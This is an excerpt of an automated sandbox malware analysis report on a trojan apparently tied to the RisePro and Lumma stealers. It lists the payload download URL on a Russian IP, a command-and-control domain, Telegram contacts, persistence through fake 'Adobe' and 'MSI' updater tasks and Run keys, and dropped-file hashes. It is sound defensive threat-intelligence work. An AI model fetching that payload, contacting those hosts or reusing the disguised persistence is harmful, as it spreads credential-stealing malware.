https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.15.dr	false	URL Reputation: safe	unknown
https://t.me/RiseProSUPPORT	tMO4FVIc9l.exe, 00000000.00000002.2258511211.000000000146E000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmp, KBHGMwjOItm_DLNJJFRnML7.zip.0.dr	false	Avira URL Cloud: safe	unknown
http://5.42.65.116/lumma2305.exeto.de	tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://employhabragaomlsp.shop/api(	RegAsm.exe, 00000019.00000002.2499274804.000000000309D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	false	URL Reputation: safe	unknown
https://ipinfo.io/Mozilla/5.0	tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	D87fZN3R3jFeplaces.sqlite.0.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	false	URL Reputation: safe	unknown
https://t.me/risepro_bot	tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2154211616.00000000061A6000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.dr	false	Avira URL Cloud: safe	unknown
https://db-ip.com:443/demo/home.php?s=8.46.123.175	tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/	tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014A2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	D87fZN3R3jFeplaces.sqlite.0.dr	false	URL Reputation: safe	unknown
https://employhabragaomlsp.shop/apiO	RegAsm.exe, 0000000C.00000002.2244993517.000000000114A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io:443/widget/demo/8.46.123.175F	tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://employhabragaomlsp.shop/apiP	RegAsm.exe, 00000015.00000002.2456519007.0000000001505000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winimage.com/zLibDll	tMO4FVIc9l.exe, 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://employhabragaomlsp.shop/8	RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	D87fZN3R3jFeplaces.sqlite.0.dr	false	URL Reputation: safe	unknown
https://employhabragaomlsp.shop/	RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352713016.0000000001346000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2244993517.000000000118F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456519007.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
188.114.96.3	employhabragaomlsp.shop	European Union	13335	CLOUDFLARENETUS	true
104.26.5.15	db-ip.com	United States	13335	CLOUDFLARENETUS	false
5.42.65.116	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446871
Start date and time:	2024-05-24 00:21:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	tMO4FVIc9l.exe renamed because original name is a hash value
Original Sample Name:	6bc7f3c7927f5fc13a4410f1770c2dfe.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@26/32@3/4
EGA Information:	Successful, ratio: 87.5%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target AdobeUpdaterV202.exe, PID 6848 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: tMO4FVIc9l.exe

Simulations

Behavior and APIs

Time	Type	Description
00:22:02	Task Scheduler	Run new task: MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR path: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
00:22:02	Task Scheduler	Run new task: MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG path: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
00:22:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe
00:22:12	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe
18:22:03	API Interceptor	30x Sleep call for process: RegAsm.exe modified
18:22:09	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.117.186.192	SecuriteInfo.com.Win32.Evo-gen.24318.16217.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	SecuriteInfo.com.Win32.Evo-gen.28489.31883.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	Raptor.HardwareService.Setup 1.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	w.sh	Get hash	malicious	Xmrig	Browse	/ip
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	uUsgzQ3DoW.exe	Get hash	malicious	RedLine	Browse	ipinfo.io/ip
	8BZBgbeCcz.exe	Get hash	malicious	RedLine	Browse	ipinfo.io/ip
188.114.96.3	http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/	Get hash	malicious	Unknown	Browse	amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/
	G5N0mtxJLN.exe	Get hash	malicious	Lokibot	Browse	rocheholding.top/evie3/five/fre.php
	Purchase Order # PO-00159.xla.xlsx	Get hash	malicious	Unknown	Browse	qr-in.com/YXcuqXy
	LHER000698175.xls	Get hash	malicious	Unknown	Browse	qr-in.com/JeYCrvM
	QUOTATION_MAYQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	filetransfer.io/data-package/sy8hP76i/download
	Purchase Order # PO-00159.xla.xlsx	Get hash	malicious	Unknown	Browse	qr-in.com/YXcuqXy
	LHER000698175.xls	Get hash	malicious	Unknown	Browse	qr-in.com/JeYCrvM
	PO 4500025813.xls	Get hash	malicious	Unknown	Browse	qr-in.com/RtWEZGi
	Home Purchase Contract and Property Details.xls	Get hash	malicious	Remcos, DBatLoader	Browse	qr-in.com/NAvSGzZ
	SCB REmittance Advice.doc	Get hash	malicious	Lokibot	Browse	rocheholding.top/evie3/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
employhabragaomlsp.shop	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	188.114.97.3
ipinfo.io	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	34.117.186.192
	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	34.117.186.192
	1n4J6tLgsc.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	N35q9x6n9c.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	PstCgdvsgB.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.PWS.RisePro.156.1977.119.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	factboletaeletricge.msi	Get hash	malicious	Unknown	Browse	34.117.186.192
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Win32.PWSX-gen.6599.4105.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
db-ip.com	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	104.26.4.15
	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.26.5.15
	1n4J6tLgsc.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	N35q9x6n9c.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	PstCgdvsgB.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	http://x6-1f3.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse	104.26.4.15
	https://support-team-9922057787-01951nbp10.netlify.app/id.html/	Get hash	malicious	Unknown	Browse	104.26.4.15
	https://standards-community-e31d71.netlify.app/id.html/	Get hash	malicious	Unknown	Browse	104.26.5.15
	https://x1-44h.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse	104.26.5.15
	SecuriteInfo.com.Trojan.PWS.RisePro.156.1977.119.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.4.15

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	SecuriteInfo.com.Win64.PWSX-gen.29347.28297.exe	Get hash	malicious	Neoreklami, PureLog Stealer	Browse	5.42.66.10
	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	5.42.65.116
	1n4J6tLgsc.exe	Get hash	malicious	RisePro Stealer	Browse	5.42.67.8
	N35q9x6n9c.exe	Get hash	malicious	RisePro Stealer	Browse	5.42.65.116
	PstCgdvsgB.exe	Get hash	malicious	RisePro Stealer	Browse	5.42.65.116
	1692db4e522605d93551ddcabeffa92a2cd43e764a134833644808319784b955_dump.exe	Get hash	malicious	RedLine	Browse	5.42.65.115
	file.exe	Get hash	malicious	RedLine	Browse	5.42.65.115
	file.exe	Get hash	malicious	RedLine	Browse	5.42.65.115
	2T6MGxlKZT.exe	Get hash	malicious	SmokeLoader	Browse	5.42.96.170
	file.exe	Get hash	malicious	Unknown	Browse	5.42.66.10
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	34.117.186.192
	SecuriteInfo.com.Win64.PWSX-gen.29347.28297.exe	Get hash	malicious	Neoreklami, PureLog Stealer	Browse	34.117.186.192
	https://qrco.de/n8mxa4i5VHuJk4PMwkLpvyNqgwLBQ0Sb/?zwphvtjquqnl/pub/cc?_ri_=X0Gzc2X%3DAQpglLjHJlYQGXHi3ygqqrREEgoSeza8UICjjze1whbSsXnwpzgE8gG5CszbXAjhO3FqKUWVXtpKX%3DUYRTAADY&_ei_=EM6hiIRZ6IbTRQzpp7EgfWDv5wmb7wtZr_HKt4Y9565l73Y_PqZSaCEhvHs0mzNqB-gBgO3tuO3UzGxLd8-XUq76ZMc933xI6KE-OcN9i_7_vZ1nKFQzNpaL4RiL4mq9EVgUJPIQMWCvlw3G0w1CjXYcIG-BSVUdKxTJ-nET9bFyCwB2_dByO9r2C-jKzARF7AriZjx_pk4nCrXsqa5CQmpAUkWEc-dfHJ9wX73GWCpfF57_v_ES7Af2szUwfyD1crCX8fOSqjBUZSUnMozbxe4aYYiNhDFxL-2jMKdpABJE3vtt_geGts7n8Xf4EYbq7j3d_IMY4o8Q72577S1E3LPhYqvKvmKbTUvvnIMLzsO6OHpvMQd9_ppOuzIIivn9ZEfO3rb9O9j_duNb3MRYEYBN-0s24zFn151NBJlyD6Gq-MjdBvSKqeeKbw5Wfsj_VyMcrEbHNU3N-Fwk31llQYD9Y_KwimheCdKUAFPtoMQQev1yIcv8hHULCmqh0T1-CEH0F10XlSOydOFp_GyqRNIoG2OjudzyH2-uSleZsarzjYlowPA825PtI7w6EzQlva8d5pko8MVh5GhEP_jIa45zP_XmcMGT6AurPE-K2-xcw0R3fJdeI2HLvwr04_2EB8cEsQvXASU8ndzsHdI_YoX-pNX-DGKMx-6o7E8ijo1A4IQu6extYnY-yNU8Vt-z9xT3l2_ybVcDcwUj0ZQbN2JWPhpiuk8AtxJGzNnIrb4fD-PiJQXEveDyN7N9WsWB0Lg4So4GVp3wT2J2c8BxTsaHBlF99Acrgm9dCZjD_F51LbRK0LCxQjX-tsn4QuELhVAmkIDb_mIoHBFMG6pvRiLCwd_1KWrY31qzwPtEFzqzLUjtacn_BU8V3jK4bE2aqaNyrQaB0oaSFT5kgpAzuJ_iH7j8LpQz0TQLZ4tmiAQeKYiG_FGPh3KXElLE7DkhVTs0Oi8Q6tLs6smyQq4eF3hLlTnnZgSTePsTLxmDzrSw-KGeDyW2LkOZ4kbkxvCGN6seSt91qJ5eDDYhrv3-FjtktxugKzF7yfbej64mQyq1x75cGd6er7nAEMPG28MGLOx9idu5hHS8xpH3XiKhrSQQ3YC3jWQ8qY-EF-Q0TcdwfOj9V-oeOy0KZ-xAMn4XoAuVsYtm7dInk0l0GcUOHwbLnVpy8vKxcHhomXAYRvCzxOe9DPAf3WyCg16exynSJ7tVWJIJA2HKvQ30Pkd9jo8ww7nT6bHa-kCAU5sP0R60XwbaOD1Va5lezql219BRJKOoQC3Ce2b6YAtmFxpVQCXmavy8ISfNPYLP7iYDoR3ywadCKdxWiaVT52gr.&_di_=auf9n3qge530sjoc9a8mlfu4dl79cq7siqsd7tr5omthg3894hpg	Get hash	malicious	Unknown	Browse	34.66.3.160
	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	34.117.186.192
	1n4J6tLgsc.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	N35q9x6n9c.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	PstCgdvsgB.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	Clear.7z	Get hash	malicious	Unknown	Browse	34.117.188.166
	http://segurogestionvirtual.brizy.site/	Get hash	malicious	Unknown	Browse	34.117.77.79
	https://actualizacionesban-colombia.brizy.site/	Get hash	malicious	Unknown	Browse	34.117.77.79
CLOUDFLARENETUS	http://bafybeicyoou3q7k5bml4hx2cqyi7ytj76vckg4hfeuvxbwxh3uw3qlhwwu.ipfs.cf-ipfs.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.64.14
	https://mariobadescu.tyb.xyz/	Get hash	malicious	Unknown	Browse	162.247.243.29
	http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://new.aj848310310.workers.dev/	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://mail.nhffurd.indianxevent.com/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://teiegam.org/	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://mantaairdrop-czw.pages.dev/	Get hash	malicious	Unknown	Browse	172.64.148.154
	http://bdrive-document-review.com/	Get hash	malicious	HTMLPhisher	Browse	104.21.37.60
	https://bnnc-fast.xyz/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://ios-trezorsuite.com/	Get hash	malicious	Unknown	Browse	104.18.2.36
CLOUDFLARENETUS	http://bafybeicyoou3q7k5bml4hx2cqyi7ytj76vckg4hfeuvxbwxh3uw3qlhwwu.ipfs.cf-ipfs.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.64.14
	https://mariobadescu.tyb.xyz/	Get hash	malicious	Unknown	Browse	162.247.243.29
	http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://new.aj848310310.workers.dev/	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://mail.nhffurd.indianxevent.com/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://teiegam.org/	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://mantaairdrop-czw.pages.dev/	Get hash	malicious	Unknown	Browse	172.64.148.154
	http://bdrive-document-review.com/	Get hash	malicious	HTMLPhisher	Browse	104.21.37.60
	https://bnnc-fast.xyz/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://ios-trezorsuite.com/	Get hash	malicious	Unknown	Browse	104.18.2.36

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	104.26.5.15 34.117.186.192 188.114.96.3
	Aktivasyon #U0130#U00e7in Gerekli Belgeler.exe	Get hash	malicious	DBatLoader	Browse	104.26.5.15 34.117.186.192 188.114.96.3
	S28BW-420120416270,pdf.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	104.26.5.15 34.117.186.192 188.114.96.3
	Dextron Group PO.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	104.26.5.15 34.117.186.192 188.114.96.3
	Aktivasyon #U0130#U00e7in Gerekli Belgeler.exe	Get hash	malicious	DBatLoader	Browse	104.26.5.15 34.117.186.192 188.114.96.3
	Purchase Order # PO-00159.xla.xlsx	Get hash	malicious	Unknown	Browse	104.26.5.15 34.117.186.192 188.114.96.3
	LHER000698175.xls	Get hash	malicious	Unknown	Browse	104.26.5.15 34.117.186.192 188.114.96.3
	Customer Advisory - HS Code - Maersk Shipping.doc.exe	Get hash	malicious	Remcos, DBatLoader	Browse	104.26.5.15 34.117.186.192 188.114.96.3
	Wgdebahewafthr.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, zgRAT	Browse	104.26.5.15 34.117.186.192 188.114.96.3
	PO 4500025813.xls	Get hash	malicious	Unknown	Browse	104.26.5.15 34.117.186.192 188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse
C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse
C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse
C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse

Created / dropped Files

C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	468480
Entropy (8bit):	7.707638639777151
Encrypted:	false
SSDEEP:	12288:8fUVPK8c9FHGovaqSdUgGe2floqIIxuSyovf4CzBIG6Dac:RK/9F1vaqbeeloqII4SHv3OG6j
MD5:	F14B083F53FEFD0071732BF5C0DCD6FA
SHA1:	661566E9131C39A1B34CABDE9A14877D9BCB3D90
SHA-256:	2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
SHA-512:	889804F0872D7882EB9160EA4B0EF7E86079006965B988BB5426F36CB2B9B354F03C411759FF74D91905EAA67B88EA5F11BE76B5F0F4F47B8AA9B53FCB9FBCDF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Joe Sandbox View:	Filename: PstCgdvsgB.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I../...\|...\|...\|..}...\|..}...\|..}...\|..}...\|...\|V..\|.l.}...\|.l.}...\|.l.}@..\|.o.}...\|.o.}...\|Rich...\|........PE..L....yOf...............'.............F............@..........................p............@.................................DY..(............................P.......?...............................>..@...............@............................text...$........................... ..`.bss................................ ..`.rdata..x...........................@..@.data...d....p.......>..............@....reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tMO4FVIc9l.exe_be92bb1bff38c722ec185b4fdc72fbebbec7f39_390e5ac0_3dbca512-effe-4dee-98ea-d0774586cddc\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1832544702794403
Encrypted:	false
SSDEEP:	192:eF3c4BMe0wXTUjyZroEOjvdzuiFdPZ24IO8bn:eq4BMFwXTUjb1zuiFdPY4IO8bn
MD5:	19A70F83B77A673C1EE9E25ABF2132B4
SHA1:	0A850B62396FECA6CB1FF8F9589C8EEC771D0EB6
SHA-256:	A50DA395D74B89AF6F859B544EF736AAC4E25208D5BCF91EB1DDAAEAF893121E
SHA-512:	9060FA3FA34A4CDFA36822B538D77DB480560D7987D26C27C0B35B72B833DEEDFFDE9504F1C4320DBF9F6A98BD0C0BE132DBE2FB7B5A55A6BAD7F89D9FE11E1E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.9.7.6.5.2.5.7.4.9.8.7.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.7.6.5.2.6.8.9.0.5.0.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.b.c.a.5.1.2.-.e.f.f.e.-.4.d.e.e.-.9.8.e.a.-.d.0.7.7.4.5.8.6.c.d.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.5.6.8.b.5.2.-.a.4.0.6.-.4.e.4.0.-.b.3.7.f.-.e.9.e.5.6.3.a.2.6.5.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.M.O.4.F.V.I.c.9.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.2.4.-.0.0.0.1.-.0.0.1.5.-.b.7.5.0.-.5.f.9.c.5.f.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.9.7.e.5.b.3.0.4.4.4.9.4.4.e.c.7.1.e.f.f.4.3.7.1.0.5.6.6.d.c.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.f.d.9.3.0.6.a.4.0.6.8.1.e.1.f.8.8.1.1.6.8.6.4.4.f.9.9.1.c.3.0.8.2.4.b.0.2.c.c.!.t.M.O.4.F.V.I.c.9.l...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E97.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu May 23 22:22:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	149998
Entropy (8bit):	1.9561167311750038
Encrypted:	false
SSDEEP:	768:mhrzQ8+FtvNIjtWKyzPHt/7MDXovD15mkhtx8VSMO:mhjY1mWKyzPHt/ILovD15mkhtOVSN
MD5:	FF6DD33C8EF6E6557693B479B0EAFAAE
SHA1:	E3823DCCC9F55938A57C4531E36BC7A46BB8C9B5
SHA-256:	3F5A831F22A0C390646494E461A29B2D4250AAAA2C80B537450F0A00FE19FE50
SHA-512:	BFD32A7FE43835000CECCADC08A1D2FBFC8C9012E4F7302AA7494EB59022752EDCB1BB5913B70630D23D53AB8797C44A1FCB246DBA8D78C4005CAF3CF3589510
Malicious:	false
